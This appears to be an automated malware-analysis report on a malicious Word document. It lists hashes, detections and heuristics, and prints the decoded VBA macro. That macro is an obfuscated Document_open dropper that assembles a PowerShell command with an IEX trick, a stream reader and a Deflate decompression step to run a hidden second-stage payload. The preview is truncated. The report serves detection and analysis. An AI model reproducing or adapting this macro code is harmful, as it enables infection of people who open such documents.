Office (OLE) malware analysis — malicious · 4e2c4d277946c00b

MALICIOUS

Office (OLE)

232.0 KB Created: 2018-07-08 21:52:00 Authoring application: Microsoft Office Word First seen: 2018-11-20

MD5: 833d573352a8b97c6a69f2412ab0544b SHA-1: ea1ba77cb0aeeddd21eb1ecbe228727bd7f929c3 SHA-256: 4e2c4d277946c00bdffe0ba8eb336870084d024e94bbbd4701bba7d9c3050786

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is configured to execute, and it utilizes a 'Shell()' call. This indicates an attempt to run an external command, likely PowerShell, as evidenced by the reconstructed string 'powershell -enc '. The primary purpose appears to be the execution of a second-stage payload.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6605137-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6605137-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16462 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	16462 bytes
SHA-256: `d275d516874d64cb83a8a35340dc65e904a330617dd3f3b79807c5422967ccac`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "twXuCzKNHDvWXH" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next dRIBMb = 59401 + HjLciH / 70690 + UTqsc + vMRFA + usHNIZ + (ZjqIw + zoqTZo / 82100 / OAjhGK) GClGB = 45307 + QZSVF / 69267 + cVWXp + hqRCs + RuCXzR + (pdIHX + TvMAl / 45606 / hDWLVA) hQliNL = 12492 + OBSEn / 89740 + TOzOVN + pfiFI + YrBzb + (HNXYJ + NnzwTT / 98143 / bCwVmU) HArYUiQFkabw ("" + kGbsiPYzTEkLsd + zcZEtsRKwjsYj + iDnjI + uozddqbTam + kiPDOnkZaw + FDIDtiXATcO + wpqRIaXqM) WlWuf = 25608 + uvlSU / 1617 + UEawzq + zMGHfU + Eokss + (hHMdU + VUqdd / 39357 / WoVwsM) WZPmz = 85325 + pHBZcz / 25073 + szdtU + Ijcnq + XjssfY + (KiwqUN + ijcDsq / 18980 / dzOSzF) End Sub Attribute VB_Name = "mzJuXGPIuDTCd" Function iDnjI() On Error Resume Next JUYom = FQSJo * wqvmfn * (16540 - HrsPz) * aOGli / PWkOb Wudzm = VuFwA * jBbnu * (20850 - Qjpqj) * DTlBs / vFoVi imPjVC = vjvzP * vfmfhE * (88823 - izksNv) * Drfzw / jYBAT YSEFOH = "pow" + pokirXz + mWMKhPRcIoUi + "e" + hiaKZGjL + DRTGJYcSGcUP + "r" + iHSmSHm + dDEQMZMEamjHQw + "s" + kLBbOpSMX + ottbujSpC + "h" + QsuXuclw + HUhvkvjo + "e" + tkHYKjLlazGIM + JjqvpabKHjZLfJ + "ll" + BRNOflVNNRAV + zHFAbOt + " " + RRZzrlUfcpPFrw + XLdiYaFqC + " " + GfhWpJVww + dbslYfEzHIsl + ". " + PKWqMjz + OAuTZwVBQ + "(" hBpmBZ = 72956 / ZJOud * ZzwFk / nTIdl - MiDmHb * RWOUkp tkKAFQ = 1157 / zXvfm * NsLBXN / AnCmS - wLiOQ * Zujwdf RjPUOfqFnR = " $p" + GPLwoSIVIiR + tzIOnDEoSIfhN + "Sho" + uiVKBcuYrqd + pWfzZjAmqPsJH + "m" + GfObNibaNGXOz + YJJQzwcfH + "E" + sDTdAtm + LbCjJOwSs + "[" + BNZqiArqrd + zKmXGkGi + "21]" + HFwGdHlAKnGJC + cuACwOnKUFW + Chr(43) + "$p" + pilWtIGTucWjF + NAoHHtipGc + "SH" + TucBHkuKbBj + YKiSdSqWTzUROO + "OM" + sfuNdmYR + wKhsMQYMj + "E[3" + XdJoHzzHksVwzi + BRllQrNTfpblD + "0" + fMPVBkY + bJqWdMhJqbWvz + "]" + Chr(43) + jPqJSXLErqq + NTEcvwJGAqqT + "'" ucVGi = 27109 / pmuPDP * Fzjmb / vWWuAz - ZfYAqJ * QbVkI YhKNr = 67018 / ABKDrL * YFbGi / KKNuZ - Jzddvi * vXpMh JulBfsTQj = "X" + YdOwwwjsWtiZwq + QnzYuWXPYo + "') " + jtuzSimjzzbvaG + RFFFJUwtKrAB + "( N" + XJikJdzjGUEhUS + woPnzTi + "E" + OwAmbdkaAaRMp + kkzlAcAihIt + "W-" + SBEbYwvjwufq + UsupIqkD + "o" + wJMNSSihRw + VqotBzlqTvjVfl + "bJ" + kVBOokiOj + fPzYVwVWE + "eC" + pnRWABcqi + KzvztKlLZJU + "t" + aVWLXKP + VjOzSjcms + " " + AFAdYELlsbFU + vffRTYQw + "S" + PjvsBinQUCF + tnSziqrPLK + "Ys" + EzVZbQEMYN + TjJoozBF + "te" + ldBZmFBM + JVzlSrtlAJ + "M" + wJjvjDbLJjz + rXBizLLK + ".io" + zmYVwFPEQMGfrt + wlrOcXCZbT + "." + BzlUhJiJ + iFuchhFLjIma + "STR" SCXajz = (cOHDSb - whLiRR / lUAqV + PnjUb + (71240 + CfmHZ - 15756 - BrmYOG)) wzEJv = (jhXkN - fpinbh / jSvDI + iFthb + (52892 + ABplP - 34621 - qVzOXM)) tAitIBTtUqM = "e" + MzzhpjuC + AROmAwIwidztXJ + "a" + OVhfvfXshi + ZRGmrTRYcizRPN + "m" + MTcnpPUZVOA + WFRSOYMWNCDsTz + "r" + PQihtfNGqE + jQcSwiFcfzAolH + "e" + YvVRoCGzS + qsLcKOQ + "A" + ZlvpsDsPQtwljw + isHiKiAJdPkTXq + "de" + SDrnzfZkKq + qPJvijbVIK + "R" + klLcTYsZSaTdFu + TXUTzbT + "((N" + opqPFMH + COTwQlzHGPvjpj + "EW" + ClqRzJSzXi + KNOLMJr + "-ob" + WGjWqVDSYzFG + bRzztvW + "J" + CvwsBkUjrCpf + vHoPiwfd + "eCt" + KmtMKwlMwU + tcBiESNDBXw + " " + sFjsbGY + iOqHWtRciKZ + "IO." + LNwtMPsSm + JRtFUVNIbQtn + "cOm" + wUmZpmkiitTvhu + KwYHwEAL + "p" zRtzS = (EzQvGs - Ewanzl / oTAUF + OkzrUa + (32418 + oTphas - 82807 - dNzRwU)) HsDZDZvqJJ = "r" + AZjYdRZrV + zYbjcVPflG + "e" + hEpnUnwucZaUA + LCPpFhW + "ss" + mTpcEcn + jBUoiEDWQra + "iO" + juSDdVQT + UkBBwVpz + "n.d" + sTfjXXLmj + KHfnuKAzStI + "E" + ADdCFAasnhOMP + FJijufJcVODL + "fLa" + UWkzojT + hjqmWaRa + "tes" + UtIPYbLqaHo + lrTLdOazNKAwA + "tRE" + nCEnXjUGLGMWc + nUfuEvCPnMFbG + "a" + SYXSDYCB + RkIERrz + "m" + XjRGzzknQb + OYDnnzJp + "( " + SBonKuKWUHUk + BRXVSklaLwC + "[s" + QdsnRBm + RMmqduGKm + "yS" + cmWboXjzs + kwpttbTCjYNlz + "T" bHrTAL = (zciHQ - uRnVZc / oBjBiq ... (truncated)

SHA-256: d275d516874d64cb83a8a35340dc65e904a330617dd3f3b79807c5422967ccac

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "twXuCzKNHDvWXH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   dRIBMb = 59401 + HjLciH / 70690 + UTqsc + vMRFA + usHNIZ + (ZjqIw + zoqTZo / 82100 / OAjhGK)
   GClGB = 45307 + QZSVF / 69267 + cVWXp + hqRCs + RuCXzR + (pdIHX + TvMAl / 45606 / hDWLVA)
   hQliNL = 12492 + OBSEn / 89740 + TOzOVN + pfiFI + YrBzb + (HNXYJ + NnzwTT / 98143 / bCwVmU)
HArYUiQFkabw ("" + kGbsiPYzTEkLsd + zcZEtsRKwjsYj + iDnjI + uozddqbTam + kiPDOnkZaw + FDIDtiXATcO + wpqRIaXqM)
   WlWuf = 25608 + uvlSU / 1617 + UEawzq + zMGHfU + Eokss + (hHMdU + VUqdd / 39357 / WoVwsM)
   WZPmz = 85325 + pHBZcz / 25073 + szdtU + Ijcnq + XjssfY + (KiwqUN + ijcDsq / 18980 / dzOSzF)
End Sub


Attribute VB_Name = "mzJuXGPIuDTCd"
Function iDnjI()
On Error Resume Next
JUYom = FQSJo * wqvmfn * (16540 - HrsPz) * aOGli / PWkOb
   Wudzm = VuFwA * jBbnu * (20850 - Qjpqj) * DTlBs / vFoVi
   imPjVC = vjvzP * vfmfhE * (88823 - izksNv) * Drfzw / jYBAT
YSEFOH = "pow" + pokirXz + mWMKhPRcIoUi + "e" + hiaKZGjL + DRTGJYcSGcUP + "r" + iHSmSHm + dDEQMZMEamjHQw + "s" + kLBbOpSMX + ottbujSpC + "h" + QsuXuclw + HUhvkvjo + "e" + tkHYKjLlazGIM + JjqvpabKHjZLfJ + "ll" + BRNOflVNNRAV + zHFAbOt + " " + RRZzrlUfcpPFrw + XLdiYaFqC + " " + GfhWpJVww + dbslYfEzHIsl + ". " + PKWqMjz + OAuTZwVBQ + "("
hBpmBZ = 72956 / ZJOud * ZzwFk / nTIdl - MiDmHb * RWOUkp
   tkKAFQ = 1157 / zXvfm * NsLBXN / AnCmS - wLiOQ * Zujwdf
RjPUOfqFnR = " $p" + GPLwoSIVIiR + tzIOnDEoSIfhN + "Sho" + uiVKBcuYrqd + pWfzZjAmqPsJH + "m" + GfObNibaNGXOz + YJJQzwcfH + "E" + sDTdAtm + LbCjJOwSs + "[" + BNZqiArqrd + zKmXGkGi + "21]" + HFwGdHlAKnGJC + cuACwOnKUFW + Chr(43) + "$p" + pilWtIGTucWjF + NAoHHtipGc + "SH" + TucBHkuKbBj + YKiSdSqWTzUROO + "OM" + sfuNdmYR + wKhsMQYMj + "E[3" + XdJoHzzHksVwzi + BRllQrNTfpblD + "0" + fMPVBkY + bJqWdMhJqbWvz + "]" + Chr(43) + jPqJSXLErqq + NTEcvwJGAqqT + "'"
ucVGi = 27109 / pmuPDP * Fzjmb / vWWuAz - ZfYAqJ * QbVkI
   YhKNr = 67018 / ABKDrL * YFbGi / KKNuZ - Jzddvi * vXpMh
JulBfsTQj = "X" + YdOwwwjsWtiZwq + QnzYuWXPYo + "') " + jtuzSimjzzbvaG + RFFFJUwtKrAB + "( N" + XJikJdzjGUEhUS + woPnzTi + "E" + OwAmbdkaAaRMp + kkzlAcAihIt + "W-" + SBEbYwvjwufq + UsupIqkD + "o" + wJMNSSihRw + VqotBzlqTvjVfl + "bJ" + kVBOokiOj + fPzYVwVWE + "eC" + pnRWABcqi + KzvztKlLZJU + "t" + aVWLXKP + VjOzSjcms + "  " + AFAdYELlsbFU + vffRTYQw + "S" + PjvsBinQUCF + tnSziqrPLK + "Ys" + EzVZbQEMYN + TjJoozBF + "te" + ldBZmFBM + JVzlSrtlAJ + "M" + wJjvjDbLJjz + rXBizLLK + ".io" + zmYVwFPEQMGfrt + wlrOcXCZbT + "." + BzlUhJiJ + iFuchhFLjIma + "STR"
SCXajz = (cOHDSb - whLiRR / lUAqV + PnjUb + (71240 + CfmHZ - 15756 - BrmYOG))
   wzEJv = (jhXkN - fpinbh / jSvDI + iFthb + (52892 + ABplP - 34621 - qVzOXM))
tAitIBTtUqM = "e" + MzzhpjuC + AROmAwIwidztXJ + "a" + OVhfvfXshi + ZRGmrTRYcizRPN + "m" + MTcnpPUZVOA + WFRSOYMWNCDsTz + "r" + PQihtfNGqE + jQcSwiFcfzAolH + "e" + YvVRoCGzS + qsLcKOQ + "A" + ZlvpsDsPQtwljw + isHiKiAJdPkTXq + "de" + SDrnzfZkKq + qPJvijbVIK + "R" + klLcTYsZSaTdFu + TXUTzbT + "((N" + opqPFMH + COTwQlzHGPvjpj + "EW" + ClqRzJSzXi + KNOLMJr + "-ob" + WGjWqVDSYzFG + bRzztvW + "J" + CvwsBkUjrCpf + vHoPiwfd + "eCt" + KmtMKwlMwU + tcBiESNDBXw + "  " + sFjsbGY + iOqHWtRciKZ + "IO." + LNwtMPsSm + JRtFUVNIbQtn + "cOm" + wUmZpmkiitTvhu + KwYHwEAL + "p"
zRtzS = (EzQvGs - Ewanzl / oTAUF + OkzrUa + (32418 + oTphas - 82807 - dNzRwU))
HsDZDZvqJJ = "r" + AZjYdRZrV + zYbjcVPflG + "e" + hEpnUnwucZaUA + LCPpFhW + "ss" + mTpcEcn + jBUoiEDWQra + "iO" + juSDdVQT + UkBBwVpz + "n.d" + sTfjXXLmj + KHfnuKAzStI + "E" + ADdCFAasnhOMP + FJijufJcVODL + "fLa" + UWkzojT + hjqmWaRa + "tes" + UtIPYbLqaHo + lrTLdOazNKAwA + "tRE" + nCEnXjUGLGMWc + nUfuEvCPnMFbG + "a" + SYXSDYCB + RkIERrz + "m" + XjRGzzknQb + OYDnnzJp + "( " + SBonKuKWUHUk + BRXVSklaLwC + "[s" + QdsnRBm + RMmqduGKm + "yS" + cmWboXjzs + kwpttbTCjYNlz + "T"
bHrTAL = (zciHQ - uRnVZc / oBjBiq 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.